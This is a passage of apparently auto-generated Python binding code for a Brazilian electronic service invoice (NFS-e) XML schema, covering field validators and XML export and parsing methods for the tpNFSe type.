if value > 99:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpSeriePrestacao' % {"value" : value} )
def validate_tpInscricaoMunicipalNulo(self, value):
# Validate type tpInscricaoMunicipalNulo, a restriction on None.
pass
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def validate_tpDocTomadorEstrangeiro(self, value):
# Validate type tpDocTomadorEstrangeiro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpNumeroEndereco(self, value):
# Validate type tpNumeroEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 9:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpComplementoEndereco(self, value):
# Validate type tpComplementoEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def validate_tpCodCidade(self, value):
# Validate type tpCodCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpCodCidade' % {"value" : value} )
def validate_tpCidadeTomadorDescricao(self, value):
# Validate type tpCidadeTomadorDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpCEPNulo(self, value):
# Validate type tpCEPNulo, a restriction on None.
pass
def validate_tpEmail(self, value):
# Validate type tpEmail, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 60:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
def validate_tpCodigoAtividade(self, value):
# Validate type tpCodigoAtividade, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpCodigoAtividade_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpCodigoAtividade_patterns_, ))
validate_tpCodigoAtividade_patterns_ = [['^[0-9]{9}$']]
def validate_tpAliquota(self, value):
# Validate type tpAliquota, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpAliquota' % {"value" : value} )
if len(str(value)) >= 6:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpAliquota' % {"value" : value} )
def validate_tpTipoRecolhimento(self, value):
# Validate type tpTipoRecolhimento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'R']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRecolhimento' % {"value" : value.encode("utf-8")} )
def validate_tpCidadeDescricao(self, value):
# Validate type tpCidadeDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpOperacao(self, value):
# Validate type tpOperacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'B', 'C', 'D', 'J']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpOperacao' % {"value" : value.encode("utf-8")} )
def validate_tpTributacao(self, value):
# Validate type tpTributacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['C', 'F', 'K', 'E', 'T', 'H', 'G', 'N', 'M']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTributacao' % {"value" : value.encode("utf-8")} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpValor_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpDescricaoRPS(self, value):
# Validate type tpDescricaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 1500:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDDDNulo(self, value):
# Validate type tpDDDNulo, a restriction on None.
pass
def validate_tpFoneNulo(self, value):
# Validate type tpFoneNulo, a restriction on None.
pass
def validate_tpMotCancelamento(self, value):
# Validate type tpMotCancelamento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 80:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
def validate_tpCPFCNPJnulo(self, value):
# Validate type tpCPFCNPJnulo, a restriction on None.
pass
def hasContent_(self):
if (
self.NumeroNota is not None or
self.DataProcessamento is not None or
self.NumeroLote is not None or
self.CodigoVerificacao is not None or
self.Assinatura is not None or
self.InscricaoMunicipalPrestador is not None or
self.RazaoSocialPrestador is not None or
self.TipoRPS is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.SituacaoRPS is not None or
self.SerieRPSSubstituido is not None or
self.NumeroRPSSubstituido is not None or
self.NumeroNFSeSubstituida is not None or
self.DataEmissaoNFSeSubstituida is not None or
self.SeriePrestacao is not None or
self.InscricaoMunicipalTomador is not None or
self.CPFCNPJTomador is not None or
self.RazaoSocialTomador is not None or
self.DocTomadorEstrangeiro is not None or
self.TipoLogradouroTomador is not None or
self.LogradouroTomador is not None or
self.NumeroEnderecoTomador is not None or
self.ComplementoEnderecoTomador is not None or
self.TipoBairroTomador is not None or
self.BairroTomador is not None or
self.CidadeTomador is not None or
self.CidadeTomadorDescricao is not None or
self.CEPTomador is not None or
self.EmailTomador is not None or
self.CodigoAtividade is not None or
self.AliquotaAtividade is not None or
self.TipoRecolhimento is not None or
self.MunicipioPrestacao is not None or
self.MunicipioPrestacaoDescricao is not None or
self.Operacao is not None or
self.Tributacao is not None or
self.ValorPIS is not None or
self.ValorCOFINS is not None or
self.ValorINSS is not None or
self.ValorIR is not None or
self.ValorCSLL is not None or
self.AliquotaPIS is not None or
self.AliquotaCOFINS is not None or
self.AliquotaINSS is not None or
self.AliquotaIR is not None or
self.AliquotaCSLL is not None or
self.DescricaoRPS is not None or
self.DDDPrestador is not None or
self.TelefonePrestador is not None or
self.DDDTomador is not None or
self.TelefoneTomador is not None or
self.MotCancelamento is not None or
self.CPFCNPJIntermediario is not None or
self.Deducoes is not None or
self.Itens is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.NumeroNota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNota>%s</ns1:NumeroNota>%s' % (self.gds_format_integer(self.NumeroNota, input_name='NumeroNota'), eol_))
if self.DataProcessamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataProcessamento>%s</ns1:DataProcessamento>%s' % (self.gds_format_datetime(self.DataProcessamento, input_name='DataProcessamento'), eol_))
if self.NumeroLote is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroLote>%s</ns1:NumeroLote>%s' % (self.gds_format_integer(self.NumeroLote, input_name='NumeroLote'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.Assinatura is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Assinatura>%s</ns1:Assinatura>%s' % (self.gds_format_base64(self.Assinatura, input_name='Assinatura'), eol_))
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
if self.TipoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRPS>%s</ns1:TipoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRPS), input_name='TipoRPS')), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.SituacaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SituacaoRPS>%s</ns1:SituacaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SituacaoRPS), input_name='SituacaoRPS')), eol_))
if self.SerieRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPSSubstituido>%s</ns1:SerieRPSSubstituido>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPSSubstituido), input_name='SerieRPSSubstituido')), eol_))
if self.NumeroRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPSSubstituido>%s</ns1:NumeroRPSSubstituido>%s' % (self.gds_format_integer(self.NumeroRPSSubstituido, input_name='NumeroRPSSubstituido'), eol_))
if self.NumeroNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFSeSubstituida>%s</ns1:NumeroNFSeSubstituida>%s' % (self.gds_format_integer(self.NumeroNFSeSubstituida, input_name='NumeroNFSeSubstituida'), eol_))
if self.DataEmissaoNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoNFSeSubstituida>%s</ns1:DataEmissaoNFSeSubstituida>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DataEmissaoNFSeSubstituida), input_name='DataEmissaoNFSeSubstituida')), eol_))
if self.SeriePrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SeriePrestacao>%s</ns1:SeriePrestacao>%s' % (self.gds_format_integer(self.SeriePrestacao, input_name='SeriePrestacao'), eol_))
if self.InscricaoMunicipalTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalTomador>%s</ns1:InscricaoMunicipalTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.InscricaoMunicipalTomador), input_name='InscricaoMunicipalTomador')), eol_))
if self.CPFCNPJTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJTomador>%s</ns1:CPFCNPJTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJTomador), input_name='CPFCNPJTomador')), eol_))
if self.RazaoSocialTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialTomador>%s</ns1:RazaoSocialTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialTomador), input_name='RazaoSocialTomador')), eol_))
if self.DocTomadorEstrangeiro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DocTomadorEstrangeiro>%s</ns1:DocTomadorEstrangeiro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DocTomadorEstrangeiro), input_name='DocTomadorEstrangeiro')), eol_))
if self.TipoLogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouroTomador>%s</ns1:TipoLogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouroTomador), input_name='TipoLogradouroTomador')), eol_))
if self.LogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:LogradouroTomador>%s</ns1:LogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.LogradouroTomador), input_name='LogradouroTomador')), eol_))
if self.NumeroEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroEnderecoTomador>%s</ns1:NumeroEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NumeroEnderecoTomador), input_name='NumeroEnderecoTomador')), eol_))
if self.ComplementoEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ComplementoEnderecoTomador>%s</ns1:ComplementoEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ComplementoEnderecoTomador), input_name='ComplementoEnderecoTomador')), eol_))
if self.TipoBairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairroTomador>%s</ns1:TipoBairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairroTomador), input_name='TipoBairroTomador')), eol_))
if self.BairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:BairroTomador>%s</ns1:BairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.BairroTomador), input_name='BairroTomador')), eol_))
if self.CidadeTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomador>%s</ns1:CidadeTomador>%s' % (self.gds_format_integer(self.CidadeTomador, input_name='CidadeTomador'), eol_))
if self.CidadeTomadorDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomadorDescricao>%s</ns1:CidadeTomadorDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CidadeTomadorDescricao), input_name='CidadeTomadorDescricao')), eol_))
if self.CEPTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CEPTomador>%s</ns1:CEPTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CEPTomador), input_name='CEPTomador')), eol_))
if self.EmailTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:EmailTomador>%s</ns1:EmailTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.EmailTomador), input_name='EmailTomador')), eol_))
if self.CodigoAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoAtividade>%s</ns1:CodigoAtividade>%s' % (self.gds_format_integer(self.CodigoAtividade, input_name='CodigoAtividade'), eol_))
if self.AliquotaAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaAtividade>%s</ns1:AliquotaAtividade>%s' % (self.gds_format_float(self.AliquotaAtividade, input_name='AliquotaAtividade'), eol_))
if self.TipoRecolhimento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRecolhimento>%s</ns1:TipoRecolhimento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRecolhimento), input_name='TipoRecolhimento')), eol_))
if self.MunicipioPrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacao>%s</ns1:MunicipioPrestacao>%s' % (self.gds_format_integer(self.MunicipioPrestacao, input_name='MunicipioPrestacao'), eol_))
if self.MunicipioPrestacaoDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacaoDescricao>%s</ns1:MunicipioPrestacaoDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MunicipioPrestacaoDescricao), input_name='MunicipioPrestacaoDescricao')), eol_))
if self.Operacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Operacao>%s</ns1:Operacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Operacao), input_name='Operacao')), eol_))
if self.Tributacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Tributacao>%s</ns1:Tributacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Tributacao), input_name='Tributacao')), eol_))
if self.ValorPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorPIS>%s</ns1:ValorPIS>%s' % (self.gds_format_float(self.ValorPIS, input_name='ValorPIS'), eol_))
if self.ValorCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCOFINS>%s</ns1:ValorCOFINS>%s' % (self.gds_format_float(self.ValorCOFINS, input_name='ValorCOFINS'), eol_))
if self.ValorINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorINSS>%s</ns1:ValorINSS>%s' % (self.gds_format_float(self.ValorINSS, input_name='ValorINSS'), eol_))
if self.ValorIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorIR>%s</ns1:ValorIR>%s' % (self.gds_format_float(self.ValorIR, input_name='ValorIR'), eol_))
if self.ValorCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCSLL>%s</ns1:ValorCSLL>%s' % (self.gds_format_float(self.ValorCSLL, input_name='ValorCSLL'), eol_))
if self.AliquotaPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaPIS>%s</ns1:AliquotaPIS>%s' % (self.gds_format_float(self.AliquotaPIS, input_name='AliquotaPIS'), eol_))
if self.AliquotaCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCOFINS>%s</ns1:AliquotaCOFINS>%s' % (self.gds_format_float(self.AliquotaCOFINS, input_name='AliquotaCOFINS'), eol_))
if self.AliquotaINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaINSS>%s</ns1:AliquotaINSS>%s' % (self.gds_format_float(self.AliquotaINSS, input_name='AliquotaINSS'), eol_))
if self.AliquotaIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaIR>%s</ns1:AliquotaIR>%s' % (self.gds_format_float(self.AliquotaIR, input_name='AliquotaIR'), eol_))
if self.AliquotaCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCSLL>%s</ns1:AliquotaCSLL>%s' % (self.gds_format_float(self.AliquotaCSLL, input_name='AliquotaCSLL'), eol_))
if self.DescricaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DescricaoRPS>%s</ns1:DescricaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DescricaoRPS), input_name='DescricaoRPS')), eol_))
if self.DDDPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDPrestador>%s</ns1:DDDPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDPrestador), input_name='DDDPrestador')), eol_))
if self.TelefonePrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefonePrestador>%s</ns1:TelefonePrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefonePrestador), input_name='TelefonePrestador')), eol_))
if self.DDDTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDTomador>%s</ns1:DDDTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDTomador), input_name='DDDTomador')), eol_))
if self.TelefoneTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefoneTomador>%s</ns1:TelefoneTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefoneTomador), input_name='TelefoneTomador')), eol_))
if self.MotCancelamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MotCancelamento>%s</ns1:MotCancelamento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MotCancelamento), input_name='MotCancelamento')), eol_))
if self.CPFCNPJIntermediario is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJIntermediario>%s</ns1:CPFCNPJIntermediario>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJIntermediario), input_name='CPFCNPJIntermediario')), eol_))
if self.Deducoes is not None:
self.Deducoes.export(outfile, level, namespace_, name_='Deducoes', pretty_print=pretty_print)
if self.Itens is not None:
self.Itens.export(outfile, level, namespace_, name_='Itens', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
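        # Dispatch on the child element's local tag name: each branch coerces
        # the text value, assigns the matching field, then runs that field's
        # simple-type validator.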
if nodeName_ == 'NumeroNota':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNota')
self.NumeroNota = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNota)
elif nodeName_ == 'DataProcessamento':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataProcessamento = dval_
elif nodeName_ == 'NumeroLote':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroLote')
self.NumeroLote = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroLote)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'Assinatura':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Assinatura')
else:
bval_ = None
self.Assinatura = bval_
# validate type tpAssinatura
self.validate_tpAssinatura(self.Assinatura)
elif nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
elif nodeName_ == 'TipoRPS':
TipoRPS_ = child_.text
TipoRPS_ = self.gds_validate_string(TipoRPS_, node, 'TipoRPS')
self.TipoRPS = TipoRPS_
# validate type tpTipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
# validate type tpDataHora
